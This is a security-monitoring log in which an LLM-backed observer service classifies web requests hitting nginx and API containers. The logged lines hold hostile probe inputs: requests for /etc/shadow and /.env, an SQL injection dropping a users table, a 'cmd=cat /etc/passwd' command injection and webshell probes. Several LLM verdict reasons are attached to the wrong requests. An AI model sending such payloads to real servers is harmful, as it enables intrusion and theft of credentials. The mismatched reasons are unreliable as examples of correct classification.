Mar 19 23:59:44 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:44.166751 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request attempts to access a sensitive file (/etc/shadow) from an external IP; indicative of probing or path traversal attempt. Line=2026-03-19T23:59:19.531808627Z 98.152.173.124 - - [19/Mar/2026:23:59:19 +0000] "api.admin.kovicloud.com" "GET /etc/shadow HTTP/2.0" 404 6603 "-" "curl/8.5.0" "-"
Mar 19 23:59:49 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:49.034104 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=malicious confidence=0.85 action=deny pattern_type=
Mar 19 23:59:49 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:49.034141 [ALERT] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP request contains an SQL injection payload in the URL (id=1;DROP+TABLE+users). This is a known attack pattern. Line=2026-03-19T23:59:20.349931496Z 10.0.1.9 - - [19/Mar/2026:23:59:20 +0000] "GET /?id=1;DROP+TABLE+users HTTP/1.0" 200 34020 "-" "curl/8.5.0" "98.152.173.124"
Mar 20 00:00:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:00.752005 [observer] Pipeline: processed=7 pattern_hits=3 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:00:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:00.752031 [observer] Patterns: hash=2 prefix=0 regex=0 contains=1 deny=1 alert=0 suppress=0 misses=4
Mar 20 00:00:01 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:01.551564 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.85 action=deny pattern_type=
Mar 20 00:00:01 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:01.551603 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=SQL injection attempt detected in the query string (DROP TABLE) from client IP. Line=2026-03-19T23:59:20.349657379Z 98.152.173.124 - - [19/Mar/2026:23:59:20 +0000] "api.admin.kovicloud.com" "GET /?id=1;DROP+TABLE+users HTTP/2.0" 200 34020 "-" "curl/8.5.0" "-"
Mar 20 00:00:13 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:13.924722 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 00:00:13 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:13.924759 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Request to wp-admin/install.php on a non-WordPress service with curl user agent and a 404, indicating probing or automated scanning. Line=2026-03-19T23:59:20.549961941Z 10.0.1.9 - - [19/Mar/2026:23:59:20 +0000] "GET /wp-admin/install.php HTTP/1.0" 404 146 "-" "curl/8.5.0" "98.152.173.124"
Mar 20 00:00:14 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:14.721674 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 00:00:14 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:14.721706 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-19T23:59:20.549961939Z 98.152.173.124 - - [19/Mar/2026:23:59:20 +0000] "api.admin.kovicloud.com" "GET /wp-admin/install.php HTTP/2.0" 404 146 "-" "curl/8.5.0" "-"
Mar 20 00:00:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:30.757320 [observer] Pipeline: processed=10 pattern_hits=3 llm_calls=7 llm_errors=0 learned=0
Mar 20 00:00:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:30.757345 [observer] Patterns: hash=2 prefix=0 regex=0 contains=1 deny=1 alert=0 suppress=0 misses=7
Mar 20 00:00:31 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:31.469810 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.66 action=alert pattern_type=
Mar 20 00:00:31 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:31.469844 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to fetch the /.env file from a remote IP using curl; HTTP 403 indicates blocked, but attempting to access sensitive env file is a common reconnaissance or misconfiguration probe. Line=2026-03-19T23:59:20.698091628Z 98.152.173.124 - - [19/Mar/2026:23:59:20 +0000] "api.admin.kovicloud.com" "GET /.env HTTP/2.0" 403 146 "-" "curl/8.5.0" "-"
Mar 20 00:00:31 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:31.469906 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-19T23:59:21.061755934Z 98.152.173.124 - - [19/Mar/2026:23:59:21 +0000] "api.admin.kovicloud.com" "GET /shell.php HTTP/2.0" 404 146 "-" "curl/8.5.0" "-"
Mar 20 00:00:31 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:31.469930 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=SQL injection attempt detected in the query string (DROP TABLE) from client IP. Line=2026-03-19T23:59:22.200147204Z 98.152.173.124 - - [19/Mar/2026:23:59:22 +0000] "api.admin.kovicloud.com" "GET /?cmd=cat+/etc/passwd HTTP/2.0" 200 34020 "-" "curl/8.5.0" "-"
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:38.484865 [llm] Empty content from LLM. Raw response (first 500 bytes): {
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: "id": "chatcmpl-DLHZeBFQsfAcDLfGML7vqcQ092BfN",
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: "object": "chat.completion",
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: "created": 1773964814,
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: "model": "gpt-5-nano-2025-08-07",
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: "choices": [
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: {
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: "index": 0,
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: "message": {
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: "role": "assistant",
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: "content": "",
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: "refusal": null,
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: "annotations": []
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: },
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: "finish_reason": "length"
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: }
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: ],
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: "usage": {
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: "prompt_tokens": 1438,
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: "completion_tokens": 4096,
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: "total_tokens": 5534,
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: "prompt_tokens_details": {
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: "cached_t...
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:38.484919 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: LLM returned empty content
Mar 20 00:00:38 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:38.484951 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-19T23:59:20.697975977Z 10.0.1.9 - - [19/Mar/2026:23:59:20 +0000] "GET /.env HTTP/1.0" 403 14...
Mar 20 00:00:53 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:53.468424 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.78 action=alert pattern_type=
Mar 20 00:00:53 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:00:53.468468 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Request attempts to access a sensitive environment file (.env) from a client; typical probing activity. Line=2026-03-19T23:59:20.698069984Z 2026/03/19 23:59:20 [error] 10#10: *4733 access forbidden by rule, client: 10.0.1.9, server: _, request: "GET /.env HTTP/1.0", host: "api.admin.kovicloud.com"
Mar 20 00:01:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:01:00.742075 [observer] Pipeline: processed=24 pattern_hits=15 llm_calls=9 llm_errors=1 learned=0
Mar 20 00:01:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:01:00.742098 [observer] Patterns: hash=14 prefix=0 regex=0 contains=1 deny=2 alert=1 suppress=0 misses=9
Mar 20 00:01:09 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:01:09.043776 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.75 action=alert pattern_type=
Mar 20 00:01:09 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:01:09.043810 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Request for /shell.php with 404 and curl user-agent indicates probing for webshells. Line=2026-03-19T23:59:21.061676078Z 10.0.1.9 - - [19/Mar/2026:23:59:21 +0000] "GET /shell.php HTTP/1.0" 404 146 "-" "curl/8.5.0" "98.152.173.124"
Mar 20 00:01:09 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:01:09.043921 [ALERT] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Password file access Line=2026-03-19T23:59:22.200816911Z 10.0.1.9 - - [19/Mar/2026:23:59:22 +0000] "GET /?cmd=cat+/etc/passwd HTTP/1.0" 200 34020 "-" "curl/8.5.0" "98.152.173.124"
Mar 20 00:01:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:01:30.751562 [observer] Pipeline: processed=27 pattern_hits=18 llm_calls=9 llm_errors=1 learned=0
Mar 20 00:01:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:01:30.751588 [observer] Patterns: hash=16 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=9
Mar 20 00:02:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:02:00.741576 [observer] Pipeline: processed=33 pattern_hits=24 llm_calls=9 llm_errors=1 learned=0
Mar 20 00:02:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:02:00.741599 [observer] Patterns: hash=22 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=9
Mar 20 00:02:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:02:30.743040 [observer] Pipeline: processed=35 pattern_hits=26 llm_calls=9 llm_errors=1 learned=0
Mar 20 00:02:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:02:30.743063 [observer] Patterns: hash=24 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=9
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:02:51.175628 [llm] Empty content from LLM. Raw response (first 500 bytes): {
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: "id": "chatcmpl-DLHbtaPl7G4nx0Rt9j2nWVYduXN6k",
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: "object": "chat.completion",
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: "created": 1773964953,
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: "model": "gpt-5-nano-2025-08-07",
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: "choices": [
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: {
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: "index": 0,
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: "message": {
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: "role": "assistant",
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: "content": "",
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: "refusal": null,
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: "annotations": []
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: },
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: "finish_reason": "length"
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: }
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: ],
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: "usage": {
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: "prompt_tokens": 1474,
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: "completion_tokens": 4096,
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: "total_tokens": 5570,
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: "prompt_tokens_details": {
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: "cached_t...
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:02:51.175665 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: LLM returned empty content
Mar 20 00:02:51 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:02:51.175676 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-20T00:02:33.105622241Z 43.154.127.188 - - [20/Mar/2026:00:02:33 +0000] "54.200.221.0" "GET /...
Mar 20 00:03:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:03:00.748604 [observer] Pipeline: processed=38 pattern_hits=28 llm_calls=10 llm_errors=2 learned=0
Mar 20 00:03:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:03:00.748629 [observer] Patterns: hash=26 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=10
Mar 20 00:03:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:03:30.743790 [observer] Pipeline: processed=42 pattern_hits=32 llm_calls=10 llm_errors=2 learned=0
Mar 20 00:03:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:03:30.743814 [observer] Patterns: hash=30 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=10
Mar 20 00:04:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:04:00.742216 [observer] Pipeline: processed=44 pattern_hits=34 llm_calls=10 llm_errors=2 learned=0
Mar 20 00:04:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:04:00.742240 [observer] Patterns: hash=32 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=10
Mar 20 00:04:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:04:30.743006 [observer] Pipeline: processed=48 pattern_hits=38 llm_calls=10 llm_errors=2 learned=0
Mar 20 00:04:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:04:30.743038 [observer] Patterns: hash=36 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=10
Mar 20 00:05:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:05:00.753501 [observer] Pipeline: processed=50 pattern_hits=40 llm_calls=10 llm_errors=2 learned=0
Mar 20 00:05:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:05:00.753526 [observer] Patterns: hash=38 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=10
Mar 20 00:05:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:05:30.741621 [observer] Pipeline: processed=53 pattern_hits=42 llm_calls=11 llm_errors=2 learned=0
Mar 20 00:05:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:05:30.741657 [observer] Patterns: hash=40 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=11
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:05:51.498055 [llm] Empty content from LLM. Raw response (first 500 bytes): {
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: "id": "chatcmpl-DLHehM7mgYTVwtCtjXH4fXyHVBx5g",
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: "object": "chat.completion",
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: "created": 1773965127,
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: "model": "gpt-5-nano-2025-08-07",
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: "choices": [
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: {
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: "index": 0,
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: "message": {
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: "role": "assistant",
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: "content": "",
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: "refusal": null,
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: "annotations": []
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: },
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: "finish_reason": "length"
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: }
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: ],
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: "usage": {
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: "prompt_tokens": 1438,
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: "completion_tokens": 4096,
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: "total_tokens": 5534,
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: "prompt_tokens_details": {
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: "cached_t...
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:05:51.498094 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: LLM returned empty content
Mar 20 00:05:51 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:05:51.498105 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-20T00:05:27.201089137Z 93.174.93.12 - - [20/Mar/2026:00:05:27 +0000] "_" "GET / HTTP/1.0" 20...
Mar 20 00:06:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:06:00.751043 [observer] Pipeline: processed=57 pattern_hits=46 llm_calls=11 llm_errors=3 learned=0
Mar 20 00:06:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:06:00.751070 [observer] Patterns: hash=44 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=11
Mar 20 00:06:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:06:30.742006 [observer] Pipeline: processed=59 pattern_hits=48 llm_calls=11 llm_errors=3 learned=0
Mar 20 00:06:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:06:30.742030 [observer] Patterns: hash=46 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=11
Mar 20 00:07:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:07:00.742517 [observer] Pipeline: processed=65 pattern_hits=54 llm_calls=11 llm_errors=3 learned=0
Mar 20 00:07:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:07:00.742546 [observer] Patterns: hash=52 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=11
Mar 20 00:07:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:07:30.749812 [observer] Pipeline: processed=67 pattern_hits=56 llm_calls=11 llm_errors=3 learned=0
Mar 20 00:07:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:07:30.749838 [observer] Patterns: hash=54 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=11
Mar 20 00:08:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:08:00.741620 [observer] Pipeline: processed=71 pattern_hits=60 llm_calls=11 llm_errors=3 learned=0
Mar 20 00:08:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:08:00.741645 [observer] Patterns: hash=58 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=11
Mar 20 00:08:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:08:30.743139 [observer] Pipeline: processed=73 pattern_hits=62 llm_calls=11 llm_errors=3 learned=0
Mar 20 00:08:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:08:30.743186 [observer] Patterns: hash=60 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=11
Mar 20 00:09:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:09:00.742415 [observer] Pipeline: processed=76 pattern_hits=64 llm_calls=12 llm_errors=3 learned=0
Mar 20 00:09:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:09:00.742435 [observer] Patterns: hash=62 prefix=0 regex=0 contains=2 deny=3 alert=1 suppress=0 misses=12
Mar 20 00:09:08 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:09:08.129993 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 00:09:08 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:09:08.130504 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Nginx error shows a GET to /developmentserver/metadatauploader with a missing file; could indicate probing for a metadata uploader endpoint. Line=2026-03-20T00:08:49.921062577Z 2026/03/20 00:08:49 [error] 422#422: *742694 open() "/usr/share/nginx/default/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.127.2...
Mar 20 00:09:08 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:09:08.130588 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T00:08:49.921217965Z 20.127.224.63 - - [20/Mar/2026:00:08:49 +0000] "54.200.221.0" "GET /developmentserver/metadatauploader HTTP/1.1" 404 2401 "-" "Mozilla/5.0 zgrab/0.x" "-"
Mar 20 00:09:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:09:30.748202 [observer] Pipeline: processed=81 pattern_hits=69 llm_calls=12 llm_errors=3 learned=0
Mar 20 00:09:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:09:30.748226 [observer] Patterns: hash=67 prefix=0 regex=0 contains=2 deny=4 alert=1 suppress=0 misses=12
Mar 20 00:10:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:10:00.749694 [observer] Pipeline: processed=83 pattern_hits=71 llm_calls=12 llm_errors=3 learned=0
Mar 20 00:10:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:10:00.749723 [observer] Patterns: hash=69 prefix=0 regex=0 contains=2 deny=4 alert=1 suppress=0 misses=12
Mar 20 00:10:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:10:30.741805 [observer] Pipeline: processed=87 pattern_hits=75 llm_calls=12 llm_errors=3 learned=0
Mar 20 00:10:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:10:30.741828 [observer] Patterns: hash=73 prefix=0 regex=0 contains=2 deny=4 alert=1 suppress=0 misses=12
Mar 20 00:11:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:11:00.751671 [observer] Pipeline: processed=89 pattern_hits=77 llm_calls=12 llm_errors=3 learned=0
Mar 20 00:11:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:11:00.751696 [observer] Patterns: hash=75 prefix=0 regex=0 contains=2 deny=4 alert=1 suppress=0 misses=12
Mar 20 00:11:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:11:30.741708 [observer] Pipeline: processed=93 pattern_hits=81 llm_calls=12 llm_errors=3 learned=0
Mar 20 00:11:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:11:30.741733 [observer] Patterns: hash=79 prefix=0 regex=0 contains=2 deny=4 alert=1 suppress=0 misses=12
Mar 20 00:12:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:12:00.743179 [observer] Pipeline: processed=97 pattern_hits=85 llm_calls=12 llm_errors=3 learned=0
Mar 20 00:12:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:12:00.743204 [observer] Patterns: hash=83 prefix=0 regex=0 contains=2 deny=4 alert=1 suppress=0 misses=12
Mar 20 00:12:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:12:30.742304 [observer] Pipeline: processed=101 pattern_hits=89 llm_calls=12 llm_errors=3 learned=0
Mar 20 00:12:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:12:30.742328 [observer] Patterns: hash=87 prefix=0 regex=0 contains=2 deny=4 alert=1 suppress=0 misses=12
Mar 20 00:13:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:13:00.749660 [observer] Pipeline: processed=103 pattern_hits=91 llm_calls=12 llm_errors=3 learned=0
Mar 20 00:13:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:13:00.749688 [observer] Patterns: hash=89 prefix=0 regex=0 contains=2 deny=4 alert=1 suppress=0 misses=12
Mar 20 00:13:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:13:30.751243 [observer] Pipeline: processed=105 pattern_hits=93 llm_calls=12 llm_errors=3 learned=0
Mar 20 00:13:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:13:30.751265 [observer] Patterns: hash=91 prefix=0 regex=0 contains=2 deny=4 alert=1 suppress=0 misses=12
Mar 20 00:14:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:14:00.743343 [observer] Pipeline: processed=109 pattern_hits=97 llm_calls=12 llm_errors=3 learned=0
Mar 20 00:14:00 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:14:00.743365 [observer] Patterns: hash=95 prefix=0 regex=0 contains=2 deny=4 alert=1 suppress=0 misses=12
Mar 20 00:14:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:14:30.756462 [observer] Pipeline: processed=111 pattern_hits=99 llm_calls=12 llm_errors=3 learned=0
Mar 20 00:14:30 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:14:30.756488 [observer] Patterns: hash=97 prefix=0 regex=0 contains=2 deny=4 alert=1 suppress=0 misses=12
Mar 20 00:14:31 ip-172-26-12-110 systemd[1]: Stopping VaultGuardian Observer...
Mar 20 00:14:31 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:14:31.901430 [observer] Shutting down...
Mar 20 00:14:31 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:14:31.905850 [observer] Final stats: processed=111 pattern_hits=99 llm_calls=12 learned=0
Mar 20 00:14:31 ip-172-26-12-110 observer[1564563]: 2026/03/20 00:14:31.905867 [observer] Shutdown complete
Mar 20 00:14:31 ip-172-26-12-110 systemd[1]: observer.service: Deactivated successfully.
Mar 20 00:14:31 ip-172-26-12-110 systemd[1]: Stopped VaultGuardian Observer.
Mar 20 00:14:31 ip-172-26-12-110 systemd[1]: Started VaultGuardian Observer.
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.921097 [observer] VaultGuardian Observer starting...
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.921181 [observer] Normalizer registry initialized
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.928260 [observer] Pattern store initialized (4 scopes)
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.928287 [observer] Analyzer pipeline ready
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.928391 [notifier] Generated default config at /var/lib/observer/notifications.yaml
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.928608 [logwatch] Notifications:
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.928623 [logwatch] ✗ webhook → not configured (set WEBHOOK_URL)
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.928627 [logwatch] ✓ email → drew@vaultdec.com
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.928630 [logwatch] ✗ sms → not configured (set TWILIO_SID + ALERT_SMS_TO)
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.928633 [logwatch] ✗ push/ios → not configured (set APNS_KEY_PATH + APNS_DEVICE_TOKEN)
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.928636 [logwatch] ✗ push/fcm → not configured (set FCM_CREDENTIALS_PATH + FCM_DEVICE_TOKEN)
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.928853 [observer] Starting container log watcher...
Mar 20 00:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:14:31.935124 [watcher] Found 8 running containers
